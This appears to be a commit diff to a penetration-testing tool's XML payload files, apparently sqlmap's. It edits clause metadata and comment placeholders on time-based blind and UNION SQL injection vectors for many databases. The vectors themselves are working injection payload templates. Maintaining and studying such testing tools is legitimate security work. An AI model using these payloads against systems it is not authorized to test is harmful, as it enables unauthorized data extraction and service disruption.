||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
|
||||
<request>
|
||||
|
@ -897,7 +897,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
|
||||
<request>
|
||||
|
@ -917,7 +917,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
|
||||
<request>
|
||||
|
@ -937,7 +937,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -957,7 +957,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -977,7 +977,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -998,7 +998,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -1019,7 +1019,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -1039,7 +1039,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -1059,7 +1059,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -1080,7 +1080,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -1101,7 +1101,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
|
||||
<request>
|
||||
|
@ -1120,7 +1120,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
|
||||
<request>
|
||||
|
@ -1139,7 +1139,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
|
||||
<request>
|
||||
|
@ -1159,7 +1159,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
|
||||
<request>
|
||||
|
@ -1179,7 +1179,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
|
@ -1199,7 +1199,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
|
@ -1219,7 +1219,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
|
@ -1240,7 +1240,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
|
@ -1261,7 +1261,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
|
@ -1281,7 +1281,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
|
@ -1301,7 +1301,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
|
@ -1322,7 +1322,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
|
||||
<request>
|
||||
|
@ -1390,7 +1390,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
|
||||
<request>
|
||||
|
@ -1410,7 +1410,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
|
@ -1430,7 +1430,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
|
@ -1450,7 +1450,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
|
@ -1469,7 +1469,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
|
@ -1488,7 +1488,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
|
@ -1507,7 +1507,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -1527,7 +1527,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -1546,7 +1546,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,3</clause>
|
||||
<clause>1,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
|
@ -1567,7 +1567,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,3</clause>
|
||||
<clause>1,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
|
||||
<request>
|
||||
|
@ -1589,7 +1589,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,3</clause>
|
||||
<clause>1,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
|
||||
<request>
|
||||
|
@ -1608,7 +1608,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,3</clause>
|
||||
<clause>1,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
|
||||
<request>
|
||||
|
@ -1627,7 +1627,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,3</clause>
|
||||
<clause>1,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
|
||||
<request>
|
||||
|
@ -1646,7 +1646,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
|
||||
<request>
|
||||
|
@ -1666,7 +1666,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -1686,7 +1686,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,3</clause>
|
||||
<clause>1,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
|
||||
<request>
|
||||
|
@ -1705,7 +1705,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
|
||||
<request>
|
||||
|
@ -1725,7 +1725,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
|
||||
<request>
|
||||
|
@ -1745,7 +1745,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
|
||||
<request>
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
|
@ -31,7 +31,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>NULL</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
|
@ -50,7 +50,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
|
@ -69,7 +69,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
|
@ -88,7 +88,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>NULL</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
|
@ -107,7 +107,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
|
@ -126,7 +126,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
|
@ -145,7 +145,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>NULL</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
|
@ -164,7 +164,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
|
@ -183,7 +183,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
|
@ -202,7 +202,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>NULL</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
|
@ -221,7 +221,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
|
@ -240,7 +240,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
|
@ -259,7 +259,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>NULL</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
|
@ -278,7 +278,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
|
@ -297,7 +297,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
|
@ -315,7 +315,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>NULL</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
|
@ -334,7 +334,7 @@
|
|||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- -</comment>
|
||||
<comment>[GENERIC_SQL_COMMENT]</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
|
|
Loading…
Reference in New Issue
Block a user